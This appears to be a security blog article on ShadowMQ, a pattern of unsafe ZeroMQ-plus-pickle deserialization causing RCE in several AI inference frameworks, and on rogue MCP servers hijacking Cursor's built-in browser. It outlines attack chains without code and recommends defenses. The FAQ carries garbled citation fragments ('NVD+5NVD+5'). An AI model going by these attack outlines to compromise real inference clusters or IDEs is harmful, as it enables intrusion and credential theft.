Modern AI stacks shipped a cluster of bugs that look almost custom-built for attackers. Critical remote code execution flaws in inference frameworks from 𝗠𝗲𝘁𝗮, 𝗡𝗩𝗜𝗗𝗜𝗔, 𝗠𝗶𝗰𝗿𝗼𝘀𝗼𝗳𝘁, and open-source projects like 𝘃𝗟𝗟𝗠, 𝗦𝗚𝗟𝗮𝗻𝗴 and 𝗠𝗼𝗱𝘂𝗹𝗮𝗿 𝗠𝗮𝘅 𝗦𝗲𝗿𝘃𝗲𝗿 all trace back to the same design mistake: unsafe ZeroMQ messaging combined with Python 𝗽𝗶𝗰𝗸𝗹𝗲 deserialization. At the same time, research into 𝗖𝘂𝗿𝘀𝗼𝗿’𝘀 AI-powered IDE shows that attackers can hijack its built-in browser and turn a developer workstation into a fully privileged malware delivery platform.
Together, these issues show how quickly insecure patterns can propagate across AI infrastructure and development tools when teams copy architecture and code without hardening it. For defenders, they are a concrete reminder that “AI security” is not theoretical anymore; it is a classic RCE and supply-chain problem wearing a new label.
𝗦𝗵𝗮𝗱𝗼𝘄𝗠𝗤: 𝘂𝗻𝘀𝗮𝗳𝗲 𝗭𝗲𝗿𝗼𝗠𝗤 + 𝗽𝗶𝗰𝗸𝗹𝗲 𝗮𝘀 𝗮 𝗽𝗮𝘁𝘁𝗲𝗿𝗻, 𝗻𝗼𝘁 𝗮 𝘀𝗶𝗻𝗴𝗹𝗲 𝗯𝘂𝗴
The first piece of the picture sits inside Meta’s 𝗟𝗹𝗮𝗺𝗮 𝗦𝘁𝗮𝗰𝗸. In affected versions, the framework exposed a ZeroMQ socket over the network and then used 𝗿𝗲𝗰𝘃_𝗽𝘆𝗼𝗯𝗷() to deserialize incoming traffic via Python’s 𝗽𝗶𝗰𝗸𝗹𝗲 module. In other words, any endpoint that could talk to that socket could send a crafted object and gain 𝗿𝗲𝗺𝗼𝘁𝗲 𝗰𝗼𝗱𝗲 𝗲𝘅𝗲𝗰𝘂𝘁𝗶𝗼𝗻 on the inference node. That flaw shipped as 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟱𝟬𝟬𝟱𝟬 and was later patched by switching to safer JSON-based serialization.
However, the more serious story is what happened next. The same unsafe pattern ZeroMQ sockets exposed over TCP, unauthenticated endpoints, and direct pickle deserialization showed up across multiple AI inference frameworks maintained by different vendors and communities. Oligo’s research team labeled this propagation pattern 𝗦𝗵𝗮𝗱𝗼𝘄𝗠𝗤: an architecture bug that quietly spread through the ecosystem as teams copied and adapted reference code.
As the analysis expanded, researchers documented near-identical logic in:
-
𝘃𝗟𝗟𝗠 (𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟯𝟬𝟭𝟲𝟱)
-
𝗡𝗩𝗜𝗗𝗜𝗔 𝗧𝗲𝗻𝘀𝗼𝗿𝗥𝗧-𝗟𝗟𝗠 (𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟮𝟯𝟮𝟱𝟰)
-
𝗠𝗼𝗱𝘂𝗹𝗮𝗿 𝗠𝗮𝘅 𝗦𝗲𝗿𝘃𝗲𝗿 (𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟲𝟬𝟰𝟱𝟱)
-
𝗠𝗶𝗰𝗿𝗼𝘀𝗼𝗳𝘁’𝘀 𝗦𝗮𝗿𝗮𝘁𝗵𝗶-𝗦𝗲𝗿𝘃𝗲 and the 𝗦𝗚𝗟𝗮𝗻𝗴 project, with partial or incomplete fixes at disclosure time.
From a defensive perspective, ShadowMQ matters less as “just a bug” and more as a supply-chain symptom. When core AI frameworks publish vulnerable patterns in their reference designs, that code doesn’t stay local; it shows up in forks, wrappers, and vendor products that trust the original implementation. That is exactly what we see here.
𝗛𝗼𝘄 𝘁𝗵𝗲𝘀𝗲 𝗔𝗜 𝗯𝘂𝗴𝘀 𝘁𝘂𝗿𝗻 𝗶𝗻𝘁𝗼 𝗿𝗲𝗮𝗹 𝗮𝘁𝘁𝗮𝗰𝗸 𝗰𝗵𝗮𝗶𝗻𝘀
In practice, exploitation still requires an attacker to reach the ZeroMQ endpoints. However, many AI deployments run inference servers inside flat internal networks, on shared Kubernetes clusters, or behind load balancers that developers treat as “trusted.” Once an attacker lands anywhere in that environment via compromised credentials, a cloud misconfiguration, or a separate application bug—they can:
-
Connect to the exposed ZMQ socket.
-
Ship a malicious pickle object that abuses the unsafe 𝗿𝗲𝗰𝘃_𝗽𝘆𝗼𝗯𝗷() logic.
-
Gain code execution on the inference node and pivot across the AI cluster.
At that point, the difference between “AI bug” and “standard infrastructure compromise” disappears. Attackers can:
-
Steal model weights and training data.
-
Tamper with responses and silently poison downstream applications.
-
Deploy additional malware such as crypto-miners or lateral-movement tooling.
Because these inference engines often sit at the center of latency-sensitive workloads, defenders rarely instrument them as heavily as traditional front-end services. As a result, a ShadowMQ exploit can look like “just another internal service talking to the model,” while in reality it runs arbitrary Python code inside the cluster.
𝗘𝗰𝗵𝗼𝗲𝘀 𝗼𝗳 𝗟𝗹𝗮𝗺𝗮’𝘀 𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟱𝟬𝟬𝟱𝟬 𝗶𝗻 𝘃𝗟𝗟𝗠, 𝗧𝗲𝗻𝘀𝗼𝗿𝗥𝗧-𝗟𝗟𝗠, 𝗮𝗻𝗱 𝗼𝘁𝗵𝗲𝗿 𝗳𝗿𝗮𝗺𝗲𝘄𝗼𝗿𝗸𝘀
Meta’s Llama-Stack vulnerability (𝗖𝗩𝗘-𝟮𝟬𝟮𝟰-𝟱𝟬𝟬𝟱𝟬) was the first widely documented example. The fix replaced pickle with JSON and tightened the messaging interface.
Later, as researchers audited related projects, they found:
-
𝗩𝗹𝗹𝗺’𝘀 𝗩𝟬 𝗲𝗻𝗴𝗶𝗻𝗲 accepted data from a ZeroMQ SUB socket and deserialized it using pickle, enabling RCE across nodes in a multi-host deployment (𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟯𝟬𝟭𝟲𝟱).
-
𝗡𝗩𝗜𝗗𝗜𝗔 𝗧𝗲𝗻𝘀𝗼𝗿𝗥𝗧-𝗟𝗟𝗠 shipped a Python executor flaw (𝗖𝗩𝗘-𝟮𝟬𝟮𝟱-𝟮𝟯𝟮𝟱𝟰) that allowed lower-privilege access to escalate into full code execution and data tampering on the inference server.
-
𝗠𝗼𝗱𝘂𝗹𝗮𝗿 𝗠𝗮𝘅 𝗦𝗲𝗿𝘃𝗲𝗿 and 𝗦𝗚𝗟𝗮𝗻𝗴 reused logic adapted from vLLM, carrying the same unsafe pattern forward in slightly altered form.
For defenders, this looks very similar to what we already know from classic OSS supply-chain incidents. Reference code that uses unsafe deserialization with 𝗽𝗶𝗰𝗸𝗹𝗲 and 𝗭𝗲𝗿𝗼𝗠𝗤 becomes a template. Even if each project tweaks names or control flow, the underlying risk remains identical.
𝗖𝘂𝗿𝘀𝗼𝗿’𝘀 𝗯𝗿𝗼𝘄𝘀𝗲𝗿 𝗮𝗻𝗱 𝗥𝗢𝗚𝗨𝗘 𝗠𝗖𝗣 𝘀𝗲𝗿𝘃𝗲𝗿𝘀: 𝘁𝘂𝗿𝗻𝗶𝗻𝗴 𝗔𝗜 𝗜𝗗𝗘𝘀 𝗶𝗻𝘁𝗼 𝗺𝗮𝗹𝘄𝗮𝗿𝗲 𝗱𝗲𝗹𝗶𝘃𝗲𝗿𝘆 𝗽𝗹𝗮𝘁𝗳𝗼𝗿𝗺𝘀
The second half of the research focuses on 𝗖𝘂𝗿𝘀𝗼𝗿, an AI-powered code editor built on top of the VS Code / Electron stack. Its new built-in browser and Model Context Protocol (𝗠𝗖𝗣) support give AI agents more reach into web apps and internal tools. Unfortunately, they also give attackers a much larger attack surface.
Knostic’s analysis shows that a malicious local MCP server can:
-
Register itself via a benign-looking 𝗺𝗰𝗽.𝗷𝘀𝗼𝗻 config.
-
Inject JavaScript into Cursor’s internal browser at runtime.
-
Replace real login pages with phishing pages that steal credentials and send them to an attacker-controlled endpoint.
Because Cursor inherits Node.js and Electron’s privileges, malicious JavaScript running in that context can access local files, modify extensions, and persist changes that survive restarts. Previous research into Cursor and VS Code already demonstrated similar risks under names like “CurXecute” and “MCPoison,” where flawed MCP handling enabled remote or arbitrary code execution against developer machines.
In other words, once an attacker convinces a developer to enable a rogue MCP server or install a compromised extension, the IDE effectively becomes an 𝗲𝗹𝗲𝘃𝗮𝘁𝗲𝗱 𝗺𝗮𝗹𝘄𝗮𝗿𝗲 𝗮𝗴𝗲𝗻𝘁. It can read SSH keys, manipulate repos, poison CI pipelines, and push backdoored code into production.
𝗪𝗵𝘆 𝘁𝗵𝗲𝘀𝗲 𝗯𝘂𝗴𝘀 𝘀𝗵𝗼𝘄 𝗮 𝗯𝗿𝗼𝗮𝗱𝗲𝗿 𝗔𝗜 𝘀𝘂𝗽𝗽𝗹𝘆-𝗰𝗵𝗮𝗶𝗻 𝗽𝗿𝗼𝗯𝗹𝗲𝗺
From a seasoned defender’s perspective, none of this is really “new.” We have seen unsafe deserialization, over-privileged services, and IDE extension abuse for years. What changed is the velocity and blast radius. AI frameworks and MCP servers are:
-
widely reused as reference implementations,
-
packaged into turnkey stacks and SaaS offerings, and
-
deployed deep inside both infrastructure and developer workflows.
As a result, a single design mistake like treating ZeroMQ + pickle as “good enough” for internal messaging, or trusting MCP servers by default can propagate into hundreds or thousands of downstream environments. When those components sit next to GPUs, production models, or CI/CD secrets, the risk profile escalates quickly.
𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗱𝗲𝗳𝗲𝗻𝘀𝗲: 𝘄𝗵𝗮𝘁 𝘁𝗼 𝗰𝗵𝗮𝗻𝗴𝗲 𝗶𝗻 𝗔𝗜 𝗶𝗻𝗳𝗿𝗮 𝗮𝗻𝗱 𝗱𝗲𝘃 𝘁𝗼𝗼𝗹𝗶𝗻𝗴
For AI platform teams, a few moves now pay off later:
First, treat 𝗜𝗻𝗳𝗲𝗿𝗲𝗻𝗰𝗲 𝗲𝗻𝗴𝗶𝗻𝗲𝘀 𝗮𝘀 𝘁𝗵𝗿𝗲𝗮𝘁 𝗯𝗼𝘂𝗻𝗱𝗮𝗿𝗶𝗲𝘀, not internal plumbing. That means blocking direct network exposure for ZeroMQ and similar protocols, using mTLS or authenticated channels where possible, and isolating inference nodes into dedicated segments with tight egress controls.
Second, aggressively 𝗲𝗹𝗶𝗺𝗶𝗻𝗮𝘁𝗲 𝘂𝗻𝘀𝗮𝗳𝗲 𝗱𝗲𝘀𝗲𝗿𝗶𝗮𝗹𝗶𝘇𝗮𝘁𝗶𝗼𝗻. If any component uses Python’s 𝗽𝗶𝗰𝗸𝗹𝗲, Java’s native serialization, or similar formats to deserialize untrusted or semi-trusted data from the network, that code should be treated as a vulnerability until proved otherwise. Safer formats (JSON, Protobuf, Cap’n Proto) and strict schema validation should be the baseline.
Third, extend 𝗿𝗮𝗻𝘀𝗼𝗻𝘄𝗮𝗿𝗲-𝘀𝘁𝘆𝗹𝗲 𝗵𝗮𝗿𝗱𝗲𝗻𝗶𝗻𝗴 to AI clusters. That includes strict identity for machine-to-machine traffic, dedicated backup strategies for model artifacts and training data, and continuous inventory of where each inference framework version runs inside the estate.
On the developer side, organizations should treat AI-powered IDEs like any other high-value endpoint:
-
Disable or constrain 𝗔𝘂𝘁𝗼-𝗥𝘂𝗻 behavior for MCP servers and extensions.
-
Maintain a curated allowlist of trusted MCP servers, with code review requirements and explicit ownership.
-
Monitor for new or unapproved MCP endpoints and browser components inside IDEs.
-
Educate developers that “AI helper servers” are 𝗿𝗲𝗺𝗼𝘁𝗲 𝗰𝗼𝗱𝗲 𝗲𝘅𝗲𝗰𝘂𝘁𝗶𝗼𝗻 𝘃𝗲𝗰𝘁𝗼𝗿𝘀, not harmless sidecars.
Finally, AI security needs to plug into existing threat-modeling and vulnerability-management programs, not operate as a separate track. ShadowMQ and the Cursor browser bugs are classic examples of why: they are not “prompt injection problems,” they are direct RCE and supply-chain issues that just happen to live inside AI-branded software.
𝗙𝗔𝗤𝘀
Q: What is ShadowMQ in the context of AI security?
A: ShadowMQ is a pattern where AI frameworks reuse ZeroMQ messaging code that deserializes network data with Python’s pickle, creating repeatable RCE conditions across Meta Llama-Stack, vLLM, TensorRT-LLM, and related projects. The Hacker News+5Oligo Security+5NVD+5
Q: How serious are the CVEs tied to these AI inference engines?
A: CVE-2024-50050, CVE-2025-30165, and CVE-2025-23254 all enable code execution on inference servers under realistic conditions, which can lead to model theft, data exposure, and further compromise of connected systems. NVD+5NVD+5NVD+5
Q: Do these vulnerabilities require direct internet exposure of the AI service?
A: Not necessarily. Attackers can often reach ZeroMQ endpoints from inside the network after exploiting other services, misconfigurations, or stolen credentials, then use ShadowMQ-style flaws as a lateral-movement amplifier. Feedly+4Oligo Security+4NVD+4
Q: How can a rogue MCP server compromise a developer using Cursor?
A: A malicious MCP server can inject JavaScript into Cursor’s built-in browser, replace login flows with phishing pages, and run with the IDE’s privileges to read files, modify extensions, and persist malware inside the development environment. Cursor+4Knostic+4Knostic+4
Q: What are the most effective short-term mitigations?
A: Inference teams should disable unsafe serialization, patch to fixed versions, and isolate AI services. Developer teams should lock down MCP usage, vet extensions, and treat AI IDEs as privileged endpoints that require monitoring and hardening. Snyk+6Oligo Security+6wiz.io+6
One thought on “Serious AI Bugs Expose Meta, Nvidia and Microsoft Inference”